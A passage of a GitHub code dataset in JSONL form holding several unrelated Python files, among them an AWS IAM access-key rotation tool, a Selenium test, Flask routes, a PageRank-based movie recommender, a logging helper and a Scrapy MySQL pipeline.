boto3.Session(profile_name=profile_name).client(\"iam\")\n\n def _get_access_keys(self, iam):\n \"\"\"\n Retrieves the users' access keys.\n\n Args:\n iam (boto3.Session): Boto3 session.\n\n Returns:\n List[AccessKey]: List of access keys and their status.\n \"\"\"\n access_keys = [\n AccessKey(\n id=key[constants.BOTO_ACCESS_KEY_ID],\n status=key[\"Status\"] == constants.ACTIVE,\n )\n for key in iam.list_access_keys()[constants.BOTO_ACCESS_KEY_METADATA]\n ]\n self.log.debug(\"Found access keys: %s\", access_keys)\n return access_keys\n\n def _create_key(self, profile_name):\n \"\"\"\n Creates a new access key, then immediately updates the credentials file with\n the new keys.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n This also contains the credentials to be rotated.\n \"\"\"\n # Instantiate session with current credentials.\n iam = self._get_boto_session(profile_name)\n new_key = iam.create_access_key()[constants.BOTO_ACCESS_KEY]\n self.log.info(\n \"Created new access key %s\", new_key[constants.BOTO_ACCESS_KEY_ID]\n )\n with self._credentials() as parser:\n parser[profile_name][constants.AWS_ACCESS_KEY_ID] = new_key[\n constants.BOTO_ACCESS_KEY_ID\n ]\n parser[profile_name][constants.AWS_SECRET_ACCESS_KEY] = new_key[\n constants.BOTO_SECRET_ACCESS_KEY\n ]\n self.log.debug(\"Wrote new credentials for profile %s\", profile_name)\n\n @retry(attempts=20, sleep_time=3)\n def _inactivate_key(self, profile_name, access_key_id):\n \"\"\"\n Inactivates the given access key.\n\n This is usually called immediately after _create_key() is called, which does\n update the credentials file locally. The retry decorator ensures that this is\n being called with the correct, new credentials.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n access_key_id (str): Access key ID to inactivate.\n \"\"\"\n self.log.debug(\"Attempting to inactivate access key %s\", access_key_id)\n iam = self._get_boto_session(profile_name)\n iam.update_access_key(AccessKeyId=access_key_id, Status=constants.INACTIVE)\n self.log.warning(\"Inactivated access key %s\", access_key_id)\n\n def _delete_key(self, profile_name, access_key_id):\n \"\"\"\n Deletes the given access key.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n access_key_id (str): Access key ID to delete.\n \"\"\"\n self.log.debug(\"Attempting to delete access key %s\", access_key_id)\n iam = self._get_boto_session(profile_name)\n iam.delete_access_key(AccessKeyId=access_key_id)\n self.log.warning(\"Deleted access key %s\", access_key_id)\n\n def rotate_credentials(self, profile_name):\n \"\"\"\n Performs IAM keypair rotation.\n\n Args:\n profile_name (str): Name of the connection profile to use for boto3.\n \"\"\"\n self.log.info(\"Performing credential rotation for profile %s\", profile_name)\n iam = self._get_boto_session(profile_name)\n access_keys = self._get_access_keys(iam)\n statuses = [access_key.status for access_key in access_keys]\n\n # Handling deletions and inactivations prior to issuing a new key. If we need\n # to delete a key due to the two key limit, we must do that first.\n\n if statuses == [True]:\n old_key = access_keys[0]\n self._create_key(profile_name)\n self._inactivate_key(profile_name, old_key.id)\n elif statuses in ([True, False], [False, True]):\n # Delete inactive key, use \"current\" active key to issue new key,\n # then deactivate the \"current\" key.\n if access_keys[0].status:\n current_active = access_keys[0]\n current_inactive = access_keys[1]\n else:\n current_active = access_keys[1]\n current_inactive = access_keys[0]\n self._delete_key(profile_name, current_inactive.id)\n self._create_key(profile_name)\n self._inactivate_key(profile_name, current_active.id)\n elif statuses == [True, True]:\n # Delete the key that does *not* match the one in the credentials file.\n # Then generate a new key and inactivate the old.\n with self._credentials() as parser:\n key_id_in_file = parser[profile_name][constants.AWS_ACCESS_KEY_ID]\n if key_id_in_file == access_keys[0].id:\n key_to_delete = access_keys[1]\n key_to_inactivate = access_keys[0]\n else:\n key_to_delete = access_keys[0]\n key_to_inactivate = access_keys[1]\n self._delete_key(profile_name, key_to_delete.id)\n self._create_key(profile_name)\n self._inactivate_key(profile_name, key_to_inactivate.id)\n self.log.info(\"Credential rotation successful for profile %s!\", profile_name)\n\n def main(self):\n profiles = set(self._get_rotatable_profiles())\n if self.config.include:\n profiles &= set(self.config.include.split(\",\"))\n self.log.debug(\"Profiles after inclusions: %s\", profiles)\n if self.config.exclude:\n profiles -= set(self.config.exclude.split(\",\"))\n self.log.debug(\"Profiles after exclusions: %s\", profiles)\n for profile in profiles:\n self.rotate_credentials(profile)\n","repo_name":"davidjoliver86/aws-key-rotator","sub_path":"aws_key_rotator/rotator.py","file_name":"rotator.py","file_ext":"py","file_size_in_byte":9628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"27135675345","text":"from typing import Dict, Any, Tuple, List\nimport networkx as nx\n\nfrom config import NODELIST_FILE_PATH\nfrom src.ktreads import KThread\n\n\ndef read_nodelist_from_file(nodelist_filepath: str = NODELIST_FILE_PATH) -> Dict[str, Dict[str, Any]]:\n \"\"\"\n Read list of cluster nodes from file.\n\n :param nodelist_filepath: Name of file with list of cluster nodes.\n :type nodelist_filepath: str\n\n :return: list of cluster nodes.\n :rtype: Dict[str, Dict[str, Any]]\n \"\"\"\n\n nodes = {}\n with open(nodelist_filepath, \"r\") as nodelist_file:\n for i, file_line in enumerate(nodelist_file):\n if not file_line.strip() or file_line.startswith(\"#\"):\n continue\n\n split_line = file_line.split(\" \")\n nodes[split_line[0]] = {\n \"IP\": split_line[0],\n \"hostname\": split_line[1],\n \"username\": split_line[2],\n \"out_intf\": split_line[3],\n \"controller\": (\n split_line[4],\n split_line[5].strip(),\n ),\n \"group\": i,\n \"IP_pool\": None,\n \"ssh\": None,\n \"ssh_chan\": None\n }\n\n return nodes\n\n\ndef get_networkx_graph(graph_data: Any) -> Tuple[nx.Graph, Dict[int, List[int]], Any]:\n \"\"\"\n Generate networkX graph from JSON string.\n\n :param graph_data: Json string, that describes graph.\n :type graph_data: Any\n\n :return:\n :rtype: Tuple[networkx.Graph, Dict[int, List[int]], Any]\n \"\"\"\n graph = nx.Graph()\n pos = {}\n for edge in graph_data[\"edges\"]:\n if int(edge[0]) not in graph.nodes():\n graph.add_node(int(edge[0]))\n pos[int(edge[0])] = [\n graph_data[\"pos\"][edge[0]][0],\n 0 - graph_data[\"pos\"][edge[0]][1],\n ]\n\n if int(edge[1]) not in graph.nodes():\n graph.add_node(int(edge[1]))\n pos[int(edge[1])] = [\n graph_data[\"pos\"][edge[1]][0],\n 0 - graph_data[\"pos\"][edge[1]][1],\n ]\n\n graph.add_edge(int(edge[0]), int(edge[1]))\n return graph, pos, graph_data[\"netapps\"]\n\n\ndef get_next_ip_pool(IP: str, hosts_number: int) -> str:\n \"\"\"\n Generate the first IP address on next IP address pool. Depends on IP address pool size.\n\n :param IP: The first address of current pool.\n :type IP: str\n :param hosts_number: The size of current pool.\n :type hosts_number: int\n\n :return: The first IP address of the next pool. The input and output IP addresses are strings.\n :rtype: str\n \"\"\"\n octets = IP.split(\".\")\n if int(octets[3]) + hosts_number >= 255:\n new_oct = divmod(int(octets[3]) + hosts_number, 255)\n next_ip_pool = (\n octets[0]\n + \".\"\n + octets[1]\n + \".\"\n + str(int(octets[2]) + int(new_oct[0]))\n + \".\"\n + str(int(new_oct[1]) + int(new_oct[0]))\n )\n else:\n next_ip_pool = (\n octets[0]\n + \".\"\n + octets[1]\n + \".\"\n + str(int(octets[2]))\n + \".\"\n + str(int(octets[3]) + hosts_number)\n )\n return next_ip_pool\n\n\ndef get_next_ip(ip: str) -> str:\n \"\"\"\n Generate the next IP address by incrementing the last octet of the current IP address.\n\n :param ip: The current IP address in the format 'x.x.x.x'.\n :type ip: str\n :return: The next incremented IP address in the format 'x.x.x.x'.\n :rtype: str\n \"\"\"\n octets = ip.split(\".\")\n if int(octets[3]) + 1 >= 255:\n next_ip = (\n octets[0] + \".\" + octets[1] + \".\" + str(int(octets[2]) + 1) + \".\" + \"1\"\n )\n else:\n next_ip = (\n octets[0]\n + \".\"\n + octets[1]\n + \".\"\n + octets[2]\n + \".\"\n + str(int(octets[3]) + 1)\n )\n return next_ip\n\n\ndef make_threaded(function: callable, args: List[Any], nodes: Dict[str, Dict[str, str]]) -> None:\n \"\"\"\n Launch a function in threads, where the number of threads is equal to the number of cluster nodes.\n\n :param function: The function to be executed in each thread.\n :type function: callable\n :param args: Arguments to be passed to the function.\n :type args: List[Any]\n :param nodes: Dictionary representing the cluster nodes map.\n :type nodes: Dict[str, Dict[str, str]]\n \"\"\"\n threads = []\n for node_label in nodes.values():\n thread = KThread(target=function, args=(node_label, *args))\n threads.append(thread)\n\n for thread in threads:\n thread.start()\n\n for thread in threads:\n thread.join()\n","repo_name":"mandesero/NPS-2","sub_path":"src/cluster_tools/cluster_support.py","file_name":"cluster_support.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32352064016","text":"try:\n\tprint(\"How_many_elements?\")\n\ta=int(input())\n\tarray = [0]*a\n\tfor i in range(len(array)):\n\t i = str(i + 1)\n\t print(\"Element \" + i, end = \" \")\n\t i = int(i)\n\t i = i - 1\n\t array[i] = int(input())\n\tprint(\"Delta:\")\n\tdelta = int(input())\n\tsmallest = array[0] if array else None\n\tfor i in array:\n\t\tif i < smallest:\n\t\t\tsmallest = i\n\tx = delta + smallest\n\tt = 0\n\tfor i in array:\n\t\tif i == x:\n\t\t\tt = t+1\n\tprint (\"Result: \", t)\t\t\nexcept ValueError :\n\tprint(\"Incorrect_data\")","repo_name":"PostnovaOlga/cp6","sub_path":"cp6.py","file_name":"cp6.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14841751189","text":"from datetime import date\nyear_current = date.today().year\namounts_users = 0 #Aqui está criando uma variável de contador vazio atribuindo 0 a variável para utilizar como contador p/ + \nsmaller_users = 0 #Aqui está criando uma variável pra utilizar como contador p/ -\nfor counter_year_users in range(1, 8):\n year_users = int(input(\"Em que ano a {}ª pessoa nasceu: \".format(counter_year_users)))\n age_users = year_current - year_users #Nessa variável está calculando a idade do usuário\n if age_users >= 18: #Nesse campo do if está vendo se a idade dos usuários são maior que 20\n amounts_users += 1 #Está somando caso seja igual o maior que 18 e adicionando a um contador\n else:\n smaller_users += 1 #Está somando caso seja menor do que a idade 18\nprint(\"Ao todo tivemos {} pessoas maiores de idade!\".format(amounts_users))\nprint(\"É também tivemos {} pessoas menores de idade\".format(smaller_users))","repo_name":"JeanDevv/Curso_python_projetos","sub_path":"Lista de exercícios/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28390207807","text":"from selenium.webdriver import Chrome\nfrom selenium.webdriver.common.keys import Keys\nimport unittest\n\nclass TestGoogle(unittest.TestCase):\n def test_GoogleでSeleniumLibraryを検索する(self):\n browser = Chrome()\n browser.get('https://google.co.jp')\n query_input = browser.find_element_by_name('q')\n query_input.send_keys('SeleniumLibrary' + Keys.ENTER)\n # 結果出力と検証\n links = browser.find_elements_by_css_selector('h3 > a')\n for link in links:\n print(link.text)\n self.assertEqual(len(links), 10)\n browser.quit()\n","repo_name":"thinkAmi-sandbox/RobotFramework-sample","sub_path":"selenium_getting_started/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"42252501420","text":"import json\nimport csv\nimport datetime\nfrom collections import OrderedDict\nfrom GeneralHelpers import CheckFileExists\nfrom BPM_STAR_Extractors.DataPoint import DataPoint\nfrom BPM_STAR_Extractors.String_Parser import Parse\n\n\nclass MakeFile:\n\n @staticmethod\n def make_json_file(source_dict, filename, indent=None):\n date = datetime.date.today()\n date_string = date.strftime('%y%m%d')\n full_filename = date_string + filename + \".\" + DataPoint.EXT_json\n path = DataPoint.PATH_DataFiles + \"\\\\\" + full_filename\n with open(path, 'w') as file:\n json.dump(source_dict, file, indent=indent, ensure_ascii=False)\n print(full_filename + \" concluded\")\n\n @staticmethod\n def parsed_12mpp():\n # loads json file 12mpp raw data as a dictionary\n volume_data_raw_dict = json.load(open(DataPoint.data_12mpp))\n print(type(volume_data_raw_dict)) # dictionary\n nd = {}\n lista = []\n month_list = ['jan', 'fev', 'mar', 'abr', 'mai', 'jun', 'jul', 'ago', 'set', 'out', 'nov', 'dez', 'total']\n\n for key, val in volume_data_raw_dict.items():\n for i in val[1]:\n lista = Parse.parse(i)\n # TODO: change json from list with one string to only string\n nd[key[slice(1, 29)].strip().replace(' ', '')] = dict(zip(month_list, lista))\n\n date = datetime.date.today()\n date_string = date.strftime('%y%m%d')\n\n with open(DataPoint.PATH_DataFiles + \"\\\\\" + date_string + \"_12mpp_parsed.json\", \"w\") as f:\n json.dump(nd, f, indent=4, sort_keys=True, ensure_ascii=False)\n\n @staticmethod\n def bm_qvv_vol():\n b3902v = json.load(open(DataPoint.data_variant_final_data))\n dozempp = json.load(open(DataPoint.data_12mpp_parsed))\n\n bm_variants_dict = dict()\n for b in b3902v:\n bm_id = b['baumuster'][0:7]\n bm_variant = b['variant']\n total_vol_key = \"total\"\n variant_total_vol = 0\n if next(filter(lambda v: v == bm_variant, dozempp.keys()), None):\n variant_total_vol = int(dozempp[bm_variant][total_vol_key])\n if variant_total_vol <= 0:\n continue\n if bm_id not in bm_variants_dict.keys(): # create bm_key, start total, add variant\n bm_variants_dict[bm_id] = {total_vol_key: variant_total_vol, bm_variant: variant_total_vol}\n else: # add variant, update total\n updated_total = bm_variants_dict[bm_id][total_vol_key] + variant_total_vol\n bm_variants_dict[bm_id].update({total_vol_key: updated_total, bm_variant: variant_total_vol})\n\n MakeFile.make_json_file(bm_variants_dict, DataPoint.filename_bm_qvv_vol, 2)\n\n @staticmethod\n def bm_qvv():\n\n b3902v = json. load(open(DataPoint.data_variant_final_data))\n dozempp = json.load(open(DataPoint.data_12mpp_parsed))\n bm_dict = json.load(open(DataPoint.data_info_bm))\n\n swap_dict = {}\n for item in b3902v:\n if item['baumuster'][0] == 'C' and item['validity_index'] == 'S' and item['variant_plausibility'] == '1':\n if item['baumuster'][0:7] in bm_dict:\n info_bm = bm_dict[item['baumuster'][0:7]]\n else:\n info_bm = ['notfound', 'notfound']\n\n swap_dict[item['variant']] = {'description': item['aggregate_description'],\n 'baumuster': item['baumuster'],\n 'family': info_bm[1]\n }\n\n with open(DataPoint.PATH_DataFiles + \"\\\\\" + 'qvv_by_bm_by_family.csv', 'w', newline='\\n') as csvfile:\n wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL)\n for variant, info in swap_dict.items():\n line = variant, info['description'], info['baumuster'], info['family']\n wr.writerow(line)\n\n return print('done')\n\n # for variant in swap_dict:\n # for data in bm_dict:\n # if variant['baumuster'][0:7] == data:\n # for dozempp_item in dozempp:\n # if item['baumuster'][0] == 'C' and item['validity_index'] == 'S' and item['variant_plausibility'] == '1':\n # if item['variant'] == dozempp_item:\n # swap_dict[item['variant']] = [namedtuple('description', item['aggregate_description']),\n # namedtuple('baumuster', item['baumuster']),\n # namedtuple('family', data[1]),\n # namedtuple('volume', dozempp_item['total'])\n # ]\n # else:\n # volume = 0\n # swap_dict[item['variant']] = [namedtuple('description', item['aggregate_description']),\n # namedtuple('baumuster', item['baumuster']),\n # namedtuple('family', data[1]),\n # namedtuple('volume', str(volume))\n # ]\n\n @staticmethod\n def concatenate_infos():\n b3902v = json.load(open(DataPoint.data_variant_final_data))\n dozempp = json.load(open(DataPoint.data_12mpp_parsed))\n bm_qvv_vol = json.load(open(DataPoint.data_qvv_bm_vol))\n bm_info = json.load(open(DataPoint.data_info_bm))\n variant_code_data = {val['variant']: val['codes'] for val in b3902v}\n\n end_dict = {}\n for (bm_id, variant_vol) in bm_qvv_vol.items():\n for (variant, vol) in variant_vol.items():\n if variant == \"total\":\n continue\n # TODO: Proper dictionary hierarchy, current structure reeks of go-horse\n end_dict[variant] = [[[bm_id, [bm_info[bm_id][0],\n bm_info[bm_id][1]]],\n dozempp[variant]],\n variant_code_data[variant]]\n\n MakeFile.make_json_file(end_dict, DataPoint.filename_dict_end, 4)\n\n\nclass MakeFinalDict:\n def __init__(self):\n if CheckFileExists.Check.open_file(DataPoint.data_final_dict):\n print('dict end available')\n self.qvv_data = json.load(open(DataPoint.data_final_dict))\n\n def variant_info_gen(self, month_data):\n\n qvvs_data = list((key, values[0][0][0], values[0][0][1][0],\n values[0][0][1][1], [i['code'] for i in values[1]], int(values[0][1][month_data]))\n for key, values in self.qvv_data.items() if values[0][1][month_data] is not '0')\n\n return qvvs_data\n\n def variant_model_gen(self, months, year):\n qvvs_data_dict = {\"year\": year, 'production': []}\n for month in months:\n monthly_production = {'month': '', # change to `month_year` and pass year along\n 'data': []}\n swap_list = []\n\n for key, values in self.qvv_data.items():\n if values[0][1][month] is not '0':\n main_dict = OrderedDict()\n main_dict['qvv'] = key\n main_dict['bm'] = values[0][0][0]\n main_dict['bu'] = values[0][0][1][0]\n main_dict['family'] = values[0][0][1][1]\n main_dict['composition'] = [i['code'] for i in values[1]]\n main_dict['volume'] = int(values[0][1][month])\n swap_list.append(main_dict)\n monthly_production['month'] = month\n monthly_production['data'] = swap_list\n qvvs_data_dict['production'].append(monthly_production)\n return qvvs_data_dict\n\n\n# MakeFile.parsed_12mpp()\n# time.sleep(5) # TODO:routine to analise if the new file is ready for next analisys\n# MakeFile.bm_qvv_vol()\n# time.sleep(5) # TODO:routine to analise if the new file is ready for next analisys\n# MakeFile.concatenate_infos()\n#\nmonth_list = ['jan', 'fev', 'mar', 'abr', 'mai', 'jun', 'jul', 'ago', 'set', 'out', 'nov', 'dez', 'total']\nyear = 2019\n#\ndate = datetime.date.today()\ndate_string = date.strftime('%y%m%d')\n#\nfor month in month_list:\n total_qvv_list = MakeFinalDict().variant_info_gen(month)\n\n with open(DataPoint.PATH_DataFiles + \"\\\\\" + date_string + \"_\" + month + '_qvvs.csv', 'w', newline='\\n') as csvfile:\n wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL)\n for line in total_qvv_list:\n wr.writerow(line)\n\ntotal_qvv_dict = MakeFinalDict().variant_model_gen(month_list, year)\nwith open(DataPoint.PATH_DataFiles + \"\\\\\" + date_string + '_dictionary_qvvs_by_month.json', 'w') as f:\n json.dump(total_qvv_dict, f, indent=4, sort_keys=True, ensure_ascii=False)\n\n# MakeFile.bm_qvv()\n","repo_name":"dormanino/dataextractor","sub_path":"BPM_STAR_Extractors/12MPP_Extraction_Parser/Pro_Pmenu_Extractor.py","file_name":"Pro_Pmenu_Extractor.py","file_ext":"py","file_size_in_byte":9144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9539295889","text":"# -*- coding: utf-8 -*-\n\nfrom flask import render_template, url_for\nfrom flask_app import flask_app\nimport pandas as pd\nimport plotly.figure_factory as ff\nfrom plotly.offline import plot\n\nimport os\n\ndef loop_content():\n\n posts = [\n {\n 'header': 'Post 1',\n 'body': 'first content'\n },\n {\n 'header': 'Post 2',\n 'body': 'Second Content!'\n }\n ]\n return render_template('index.html', title='Home', posts=posts)\n\ndef has_no_empty_params(rule):\n ''' helper function for site-map \n '''\n defaults = rule.defaults if rule.defaults is not None else ()\n arguments = rule.arguments if rule.arguments is not None else ()\n return len(defaults) >= len(arguments)\n\n\n@flask_app.route('/')\n@flask_app.route('/index')\n@flask_app.route(\"/site-map\")\ndef site_map():\n '''\n https://stackoverflow.com/questions/13317536/get-list-of-all-routes-defined-in-the-flask-app\n '''\n \n links = []\n for rule in flask_app.url_map.iter_rules():\n # Filter out rules we can't navigate to in a browser\n # and rules that require parameters\n if \"GET\" in rule.methods and has_no_empty_params(rule):\n url = url_for(rule.endpoint, **(rule.defaults or {}))\n links.append({\"url\": url, \"route\": rule.endpoint})\n \n return render_template('site-map.html', title='Home', link_list=links)\n # links is now a list of url, endpoint tuples\n \n@flask_app.route(\"/hello-table\")\ndef hello_table():\n df = pd.read_csv(\"data/hello_world.csv\")\n fig = ff.create_table(df)\n return plot(fig, output_type='div')\n ","repo_name":"john-telfeyan/flask-ploty-pd-template","sub_path":"flask_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28481756577","text":"import csv\nimport pprint as pp\nimport networkx as nx\nimport itertools as it\nimport math\nimport scipy.sparse\nimport random\n\n\n\n\ndef pagerank(M, N, nodelist, alpha=0.85, personalization=None, max_iter=100, tol=1.0e-6, dangling=None):\n\tif N == 0:\n\t\treturn {}\n\tS = scipy.array(M.sum(axis=1)).flatten()\n\tS[S != 0] = 1.0 / S[S != 0]\n\tQ = scipy.sparse.spdiags(S.T, 0, *M.shape, format='csr')\n\tM = Q * M\n\t\n\t# initial vector\n\tx = scipy.repeat(1.0 / N, N)\n\t\n\t# Personalization vector\n\tif personalization is None:\n\t\tp = scipy.repeat(1.0 / N, N)\n\telse:\n\t\tmissing = set(nodelist) - set(personalization)\n\t\tif missing:\n\t\t\t#raise NetworkXError('Personalization vector dictionary must have a value for every node. Missing nodes %s' % missing)\n\t\t\tprint\n\t\t\tprint('Error: personalization vector dictionary must have a value for every node')\n\t\t\tprint\n\t\t\texit(-1)\n\t\tp = scipy.array([personalization[n] for n in nodelist], dtype=float)\n\t\t#p = p / p.sum()\n\t\tsum_of_all_components = p.sum()\n\t\tif sum_of_all_components > 1.001 or sum_of_all_components < 0.999:\n\t\t\tprint\n\t\t\tprint(\"Error: the personalization vector does not represent a probability distribution :(\")\n\t\t\tprint\n\t\t\texit(-1)\n\t\n\t# Dangling nodes\n\tif dangling is None:\n\t\tdangling_weights = p\n\telse:\n\t\tmissing = set(nodelist) - set(dangling)\n\t\tif missing:\n\t\t\t#raise NetworkXError('Dangling node dictionary must have a value for every node. Missing nodes %s' % missing)\n\t\t\tprint\n\t\t\tprint('Error: dangling node dictionary must have a value for every node.')\n\t\t\tprint\n\t\t\texit(-1)\n\t\t# Convert the dangling dictionary into an array in nodelist order\n\t\tdangling_weights = scipy.array([dangling[n] for n in nodelist], dtype=float)\n\t\tdangling_weights /= dangling_weights.sum()\n\tis_dangling = scipy.where(S == 0)[0]\n\n\t# power iteration: make up to max_iter iterations\n\tfor _ in range(max_iter):\n xlast = x\n x = alpha * (x * M + sum(x[is_dangling]) * dangling_weights) + (1 - alpha) * p\n # check convergence, l1 norm\n err = scipy.absolute(x - xlast).sum()\n if err < N * tol:\n return dict(zip(nodelist, map(float, x)))\n\t#raise NetworkXError('power iteration failed to converge in %d iterations.' % max_iter)\n\tprint\n\tprint('Error: power iteration failed to converge in '+str(max_iter)+' iterations.')\n\tprint\n\texit(-1)\n\n\n\n\ndef create_graph_set_of_users_set_of_items(user_item_ranking_file):\n\tgraph_users_items = {}\n\tall_users_id = set()\n\tall_items_id = set()\n\tg = nx.DiGraph()\n\tinput_file = open(user_item_ranking_file, 'r')\n\tinput_file_csv_reader = csv.reader(input_file, delimiter='\\t', quotechar='\"', quoting=csv.QUOTE_NONE)\n\tfor line in input_file_csv_reader:\n\t\tuser_id = int(line[0])\n\t\titem_id = int(line[1])\n\t\trating = int(line[2])\n\t\tg.add_edge(user_id, item_id, weight=rating)\n\t\tall_users_id.add(user_id)\n\t\tall_items_id.add(item_id)\n\tinput_file.close()\n\tgraph_users_items['graph'] = g\n\tgraph_users_items['users'] = all_users_id\n\tgraph_users_items['items'] = all_items_id\n\treturn graph_users_items\n\n\ndef create_item_item_graph(graph_users_items):\n g = nx.Graph()\n items = list(graph_users_items.get('items'))\n gui = graph_users_items.get('graph').to_undirected()\n \n for i in range(len(items)):\n for j in range(i):\n movie1 = gui[items[i]]\n movie2 = gui[items[j]]\n users1 = set(movie1.keys())\n users2 = set(movie2.keys())\n weight = len(users1.intersection(users2))\n if weight > 0:\n g.add_edge(items[i], items[j], weight=weight)\n \n graph_users_items['items_iig'] = set(g.nodes())\n return g\n\n\n\n\ndef create_preference_vector_for_teleporting(user_id, graph_users_items):\n preference_vector = {}\n\n items_iig = graph_users_items.get('items_iig')\n\n gui = graph_users_items.get('graph')\n items_from_user = set(gui[user_id]).intersection(items_iig)\n sum_all_scores = 0\n for i in items_from_user:\n sum_all_scores = sum_all_scores + gui[user_id][i]['weight']\n\n for i in items_from_user:\n preference_vector[i] = gui[user_id][i]['weight']/sum_all_scores\n \n for i in items_iig:\n if preference_vector.get(i) == None:\n preference_vector[i] = 0\n \n return preference_vector\n\t\n\n\n\ndef create_ranked_list_of_recommended_items(page_rank_vector_of_items, user_id, training_graph_users_items):\n # This is a list of 'item_id' sorted in descending order of score.\n sorted_list_of_recommended_items = []\n \n already_rated = training_graph_users_items['graph'][user_id]\n ranked_list = list(page_rank_vector_of_items.items())\n ranked_list.sort(key=lambda x:x[1], reverse = True)\n for t in ranked_list:\n if already_rated.get(t[0]) == None:\n sorted_list_of_recommended_items.append(t[0])\n \n return sorted_list_of_recommended_items\n\n\n\n\ndef discounted_cumulative_gain(user_id, sorted_list_of_recommended_items, test_graph_users_items):\n dcg = 0.\n raitings = test_graph_users_items['graph'][user_id]\n k = 1\n for i in sorted_list_of_recommended_items:\n if raitings.get(i) !=None:\n dcg+=raitings[i][\"weight\"]/math.log(k+1,2)\n k+=1\n return dcg\n\t\n \n\n\ndef maximum_discounted_cumulative_gain(user_id, test_graph_users_items):\n dcg = 0.\n raitings = test_graph_users_items['graph'][user_id]\n k = 1\n r = []\n for i in raitings.keys():\n r.append(raitings[i][\"weight\"])\n r.sort(reverse=True)\n for i in r:\n dcg+=i/math.log(k+1,2)\n k+=1\n return dcg\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Laolga/Page-rank-for-movie-recommendation","sub_path":"Network_Based_Recommendation_System_FUNCTIONS.py","file_name":"Network_Based_Recommendation_System_FUNCTIONS.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22392686107","text":"\"\"\"This module create a logger that is able to aggregate log messages.\"\"\"\n\nfrom logging import (\n getLogger,\n CRITICAL,\n FATAL,\n ERROR,\n WARNING,\n INFO,\n DEBUG,\n NOTSET,\n basicConfig,\n Logger,\n)\nfrom logging.handlers import SysLogHandler\nfrom os import path\n\nfrom logprep.util.log_aggregator import Aggregator\n\nname_to_level = {\n \"CRITICAL\": CRITICAL,\n \"FATAL\": FATAL,\n \"ERROR\": ERROR,\n \"WARN\": WARNING,\n \"WARNING\": WARNING,\n \"INFO\": INFO,\n \"DEBUG\": DEBUG,\n \"NOTSET\": NOTSET,\n}\n\n\nclass AggregatingLogger:\n \"\"\"Used to create logger that aggregates log messages.\"\"\"\n\n logger_config = None\n level_str = None\n log_level = None\n\n @classmethod\n def setup(cls, config: dict, logger_disabled: bool = False):\n \"\"\"Setup aggregating logger.\n\n Parameters\n ----------\n config : dict\n Logprep configuration\n logger_disabled : bool\n Defines if aggregating loggers are enabled or not\n\n \"\"\"\n cls.logger_disabled = logger_disabled\n cls.logger_config = config.get(\"logger\", dict())\n\n cls.level_str = cls.logger_config.get(\"level\", \"INFO\")\n\n cls.log_level = name_to_level.get(cls.level_str.upper(), INFO)\n basicConfig(\n level=cls.log_level, format=\"%(asctime)-15s %(name)-5s %(levelname)-8s: %(message)s\"\n )\n\n Aggregator.count_threshold = cls.logger_config.get(\"aggregation_threshold\", 4)\n Aggregator.log_period = cls.logger_config.get(\"aggregation_period\", 30)\n Aggregator.start_timer()\n\n @classmethod\n def create(cls, name: str) -> Logger:\n \"\"\"Create aggregating logger.\n\n Parameters\n ----------\n name : str\n Name for aggregating logger.\n\n Returns\n -------\n logger : logging.Logger\n Logger with aggregating filter\n\n \"\"\"\n logger = getLogger(name)\n logger.disabled = cls.logger_disabled\n\n if path.exists(\"/dev/log\"):\n logger.handlers = []\n logger.addHandler(SysLogHandler(address=\"/dev/log\"))\n\n if cls.level_str.upper() not in name_to_level.keys():\n logger.info(f\"Invalid log level '{cls.level_str.upper()}', defaulting to 'INFO'\")\n else:\n logger.setLevel(cls.log_level)\n logger.info(f\"Log level set to '{cls.level_str.upper()}'\")\n\n logger.addFilter(Aggregator(\"Agregator\"))\n\n return logger\n","repo_name":"herrfeder/Logprep","sub_path":"logprep/util/aggregating_logger.py","file_name":"aggregating_logger.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"36086556045","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport pymysql\nfrom twisted.enterprise import adbapi\nimport pymysql.cursors\nimport codecs,json\n\nclass MysqlTwistedPipeline(object):\n #通过twisted框架调用adbapi实现异步的数据写入\n def __init__(self,dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls,settings):\n #通过settings中设置的数据库信息,将数据库导入到pool中\n dbparms =dict(\n host = settings[\"MYSQL_HOST\"],\n db = settings[\"MYSQL_DBNAME\"],\n user = settings[\"MYSQL_USER\"],\n password = settings[\"MYSQL_PASSWORD\"],\n charset = \"utf8\",\n cursorclass = pymysql.cursors.DictCursor,\n use_unicode = True,\n )\n dbpool = adbapi.ConnectionPool(\"pymysql\",**dbparms)\n return cls(dbpool)\n\n def process_item(self, item, spider):\n #调用twisted的api实现异步插入\n query = self.dbpool.runInteraction(self.do_insert,item)\n query.addErrback(self.handle_err,item,spider)\n\n def handle_err(self,failure,item,spider):\n print(failure)\n\n def do_insert(self,cursor,item):\n #具体的插入函数\n 